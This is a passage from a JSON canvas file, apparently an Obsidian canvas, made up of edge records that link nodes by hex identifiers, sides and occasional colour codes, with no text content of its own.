		{"id":"6e8cf9582e4a0500","fromNode":"1423974a6d1ba0d1","fromSide":"left","toNode":"9874eb1622fe61eb","toSide":"right"},
		{"id":"6f8106062f2d3ba9","fromNode":"1da1bf62207b73bf","fromSide":"left","toNode":"94a0e4970e720140","toSide":"right"},
		{"id":"7c48ae13533edac8","fromNode":"dda50923a07f19b6","fromSide":"left","toNode":"8dd532d66174f834","toSide":"right"},
		{"id":"c5b9e6eee2c3c539","fromNode":"1da1bf62207b73bf","fromSide":"left","toNode":"dda50923a07f19b6","toSide":"right"},
		{"id":"1b1ce095ef8b5ac8","fromNode":"a5657be0052b21b4","fromSide":"right","toNode":"a77417db335770b4","toSide":"left"},
		{"id":"b8a7ddb8880e885f","fromNode":"a77417db335770b4","fromSide":"right","toNode":"59170f3ea19b642f","toSide":"left"},
		{"id":"310e209c174aafda","fromNode":"a77417db335770b4","fromSide":"right","toNode":"80d99aedeb039daa","toSide":"left"},
		{"id":"9e33d09110c854e1","fromNode":"a77417db335770b4","fromSide":"right","toNode":"d6d94240af95f1fa","toSide":"left"},
		{"id":"d2f69d571eb7aed5","fromNode":"59170f3ea19b642f","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"dd8efb6596588177","fromNode":"80d99aedeb039daa","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"3d6cbd36c1b53fc3","fromNode":"d6d94240af95f1fa","fromSide":"right","toNode":"7dd0c1a9782a1259","toSide":"left"},
		{"id":"ec0e56e8e42a38b6","fromNode":"52c73efa9250685c","fromSide":"right","toNode":"eb173489af0c76d1","toSide":"left"},
		{"id":"3716bcfc0d19d0cb","fromNode":"310fc0d025eaa781","fromSide":"right","toNode":"61a872e658dfe5c0","toSide":"left"},
		{"id":"bf0ddd36b7228d18","fromNode":"abe18e07d0219c92","fromSide":"right","toNode":"310fc0d025eaa781","toSide":"left"},
		{"id":"d7d5b1d02072bf04","fromNode":"abe18e07d0219c92","fromSide":"right","toNode":"52c73efa9250685c","toSide":"left"},
		{"id":"45d7eff695547de8","fromNode":"59570f94b9250d2e","fromSide":"right","toNode":"abe18e07d0219c92","toSide":"left"},
		{"id":"22b76b8d62e1e387","fromNode":"61a872e658dfe5c0","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"5328456aa7b3ad17","fromNode":"eb173489af0c76d1","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"d8f59b9b8915a0b1","fromNode":"e7518bfe4e3d2a04","fromSide":"right","toNode":"59570f94b9250d2e","toSide":"left"},
		{"id":"2eed3fab512fb721","fromNode":"e7518bfe4e3d2a04","fromSide":"right","toNode":"519fb02a7d927135","toSide":"left"},
		{"id":"3a68f95862e37b2c","fromNode":"0e6da9744b61366c","fromSide":"left","toNode":"66a989b2ce7955a1","toSide":"right"},
		{"id":"de13657a42efd0d0","fromNode":"66a989b2ce7955a1","fromSide":"left","toNode":"a84cf981923b7f68","toSide":"right"},
		{"id":"48206cfef134f5c8","fromNode":"e81977e44c9be781","fromSide":"left","toNode":"91e05c95557b3633","toSide":"right"},
		{"id":"4ae834eb72dbf725","fromNode":"e81977e44c9be781","fromSide":"left","toNode":"0e6da9744b61366c","toSide":"right"},
		{"id":"a67b5c56e205ebc7","fromNode":"1dd46bc058c62b3c","fromSide":"left","toNode":"11707e48c1e1a141","toSide":"right"},
		{"id":"edc05454956997da","fromNode":"5366fb544222be19","fromSide":"left","toNode":"1dd46bc058c62b3c","toSide":"right"},
		{"id":"1554c33eda5a7cfe","fromNode":"91e05c95557b3633","fromSide":"left","toNode":"5366fb544222be19","toSide":"right"},
		{"id":"c03eaaabdead7f8a","fromNode":"cf5e7178a6c07781","fromSide":"left","toNode":"287373da86ddd7bd","toSide":"right"},
		{"id":"984bc6f3724ad3ea","fromNode":"d45048da5b52c0e8","fromSide":"left","toNode":"cf5e7178a6c07781","toSide":"right"},
		{"id":"594cc0e0e2948ebd","fromNode":"287373da86ddd7bd","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"e9e6c5b2c61cffd1","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"0df34b2ce7779a14","toSide":"left"},
		{"id":"4b3251e2c4898e5c","fromNode":"0df34b2ce7779a14","fromSide":"right","toNode":"81e94ba50e067092","toSide":"left"},
		{"id":"855b9b6ce02a6607","fromNode":"81e94ba50e067092","fromSide":"right","toNode":"8209634c9d537ed4","toSide":"left"},
		{"id":"26384083e35d7add","fromNode":"6f7a5c655bd1b965","fromSide":"left","toNode":"f3ad80bcfe018a40","toSide":"right"},
		{"id":"530ff2b884169d38","fromNode":"f3ad80bcfe018a40","fromSide":"left","toNode":"7e49eb10ca6f5757","toSide":"right"},
		{"id":"d7f2127ef90e0b1c","fromNode":"7e49eb10ca6f5757","fromSide":"left","toNode":"9064238ac18087ba","toSide":"right"},
		{"id":"c915ade9cecc845e","fromNode":"9064238ac18087ba","fromSide":"left","toNode":"8209634c9d537ed4","toSide":"right","color":"#3dfffc"},
		{"id":"5a055a3b5e2f0e57","fromNode":"77071a338b4ae4d0","fromSide":"top","toNode":"d54377d7edd089e0","toSide":"left"},
		{"id":"99321de027e150ff","fromNode":"d54377d7edd089e0","fromSide":"bottom","toNode":"7cc43aa399754661","toSide":"top"},
		{"id":"eec8cac78b70c02f","fromNode":"de583cf5c784e101","fromSide":"right","toNode":"4f0282692097be94","toSide":"left"},
		{"id":"b2678bbb415be731","fromNode":"e027d50cd519e8b9","fromSide":"right","toNode":"04b04eb552ce441d","toSide":"left"},
		{"id":"ad6cbcaf4fdafc87","fromNode":"16a8d9f4d6ce0925","fromSide":"right","toNode":"17b0029c99e27636","toSide":"left"},
		{"id":"17694eb6c37023f6","fromNode":"519fb02a7d927135","fromSide":"right","toNode":"e027d50cd519e8b9","toSide":"left"},
		{"id":"9a0cb1b5d338c916","fromNode":"519fb02a7d927135","fromSide":"right","toNode":"16a8d9f4d6ce0925","toSide":"left"},
		{"id":"e67abb22ce10d444","fromNode":"04b04eb552ce441d","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"d5cf4c504d0bb217","fromNode":"17b0029c99e27636","fromSide":"right","toNode":"1f0cc683a5d4144e","toSide":"left"},
		{"id":"2737d3ea8c7f7b44","fromNode":"b43cdd2457a7e306","fromSide":"left","toNode":"03ef73ab057c6aa8","toSide":"right"},
		{"id":"0f2b5e418f7d50b2","fromNode":"03ef73ab057c6aa8","fromSide":"left","toNode":"72949c86b6c72209","toSide":"right"},
		{"id":"323f6b382add9a43","fromNode":"72949c86b6c72209","fromSide":"left","toNode":"1bf9e55a732d0cd2","toSide":"right"},
		{"id":"dd1ffa7427c59632","fromNode":"11707e48c1e1a141","fromSide":"left","toNode":"971ac7a48bc9d48a","toSide":"right","color":"#f0ff24"},
		{"id":"5411dd39030427d0","fromNode":"4f0282692097be94","fromSide":"right","toNode":"3617fc4e04469b66","toSide":"left"},
		{"id":"48189aa39cb869cb","fromNode":"3617fc4e04469b66","fromSide":"right","toNode":"971ac7a48bc9d48a","toSide":"left"},
		{"id":"11a500c79b29bd2e","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"e6080f5fcb0e0aa1","toSide":"right"},
		{"id":"2cd21305d33b6037","fromNode":"e6080f5fcb0e0aa1","fromSide":"left","toNode":"2ff0f3e439b8dd09","toSide":"right"},
		{"id":"9d62d5fa16abc039","fromNode":"2ff0f3e439b8dd09","fromSide":"left","toNode":"c13ccadb8997ef05","toSide":"right"},
		{"id":"c7caba09216d8ac0","fromNode":"c13ccadb8997ef05","fromSide":"left","toNode":"9fc36171dc101cae","toSide":"right","color":"4"},
		{"id":"95687efa2929dd67","fromNode":"94a0e4970e720140","fromSide":"left","toNode":"8c2a93016be5b298","toSide":"right"},
		{"id":"b2756bcd091e96c9","fromNode":"1423974a6d1ba0d1","fromSide":"left","toNode":"b13418b4cc74fb85","toSide":"right"},
		{"id":"b5b37373b6bbc65a","fromNode":"d45048da5b52c0e8","fromSide":"left","toNode":"1423974a6d1ba0d1","toSide":"right"},
		{"id":"c2b5a42ff58fe923","fromNode":"d45048da5b52c0e8","fromSide":"left","toNode":"1da1bf62207b73bf","toSide":"right"},
		{"id":"c5174195f8dd1e8b","fromNode":"9874eb1622fe61eb","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"d27eb0756ffbe846","fromNode":"8dd532d66174f834","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"33f9ed71e66110c1","fromNode":"8c2a93016be5b298","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"d3f07db970084b8e","fromNode":"0581355edea7e0eb","fromSide":"right","toNode":"c30a20baf7474793","toSide":"left"},
		{"id":"fe2f97064fa67d9a","fromNode":"dbaaa78274848b06","fromSide":"right","toNode":"0581355edea7e0eb","toSide":"left"},
		{"id":"471f5c74e8dbfcce","fromNode":"2ecea737e06d4576","fromSide":"right","toNode":"4059fd2f11279a8b","toSide":"left"},
		{"id":"50266c0112ec0b08","fromNode":"dbaaa78274848b06","fromSide":"right","toNode":"2ecea737e06d4576","toSide":"left"},
		{"id":"848bac1a4fb845f0","fromNode":"35f4a7cf15b3565e","fromSide":"right","toNode":"dbaaa78274848b06","toSide":"left"},
		{"id":"a25c11159e680299","fromNode":"4059fd2f11279a8b","fromSide":"right","toNode":"14f23e71f8aef871","toSide":"left"},
		{"id":"cb014972ffc6d734","fromNode":"c30a20baf7474793","fromSide":"right","toNode":"14f23e71f8aef871","toSide":"left"},
		{"id":"cd03cd71ba0f525a","fromNode":"4f0282692097be94","fromSide":"right","toNode":"35463c1471f7d024","toSide":"left"},
		{"id":"d26cbb947434da70","fromNode":"35463c1471f7d024","fromSide":"right","toNode":"971ac7a48bc9d48a","toSide":"left"},
		{"id":"d576edae1c2adeae","fromNode":"b13418b4cc74fb85","fromSide":"left","toNode":"ade906f9fa3719d4","toSide":"right"},
		{"id":"1e920c92f861fc00","fromNode":"e5712d4396ae46c0","fromSide":"right","toNode":"7a348eb82fc2e891","toSide":"left"},
		{"id":"8cea88df4c570636","fromNode":"7a348eb82fc2e891","fromSide":"right","toNode":"943c0a1d0316a739","toSide":"left"},
		{"id":"3f593ca6892613ee","fromNode":"d23beb5101c5b310","fromSide":"left","toNode":"b92ed687ac196517","toSide":"right"},
		{"id":"4e5f09bea413a167","fromNode":"59359e3a5c3d4535","fromSide":"left","toNode":"d23beb5101c5b310","toSide":"right"},
		{"id":"d95838e7e4c1f4ce","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"59359e3a5c3d4535","toSide":"right"},
		{"id":"5b679a6bd0d83153","fromNode":"5802a5970cdb4414","fromSide":"left","toNode":"ddee697d53d248fa","toSide":"right"},
		{"id":"7bd67505c0f23e98","fromNode":"71895cd69bc8c284","fromSide":"left","toNode":"b26f0d06c675a891","toSide":"right"},
		{"id":"1420eb30729b31da","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"5802a5970cdb4414","toSide":"right"},
		{"id":"e308fef08b5d9806","fromNode":"ec15a9d60e148a70","fromSide":"left","toNode":"71895cd69bc8c284","toSide":"right"},
		{"id":"ed4d455c84631c55","fromNode":"ddee697d53d248fa","fromSide":"left","toNode":"b92ed687ac196517","toSide":"right"},
		{"id":"2d1232cd633e8ddc","fromNode":"b26f0d06c675a891","fromSide":"left","toNode":"b92ed687ac196517","toSide":"right"}
	]
}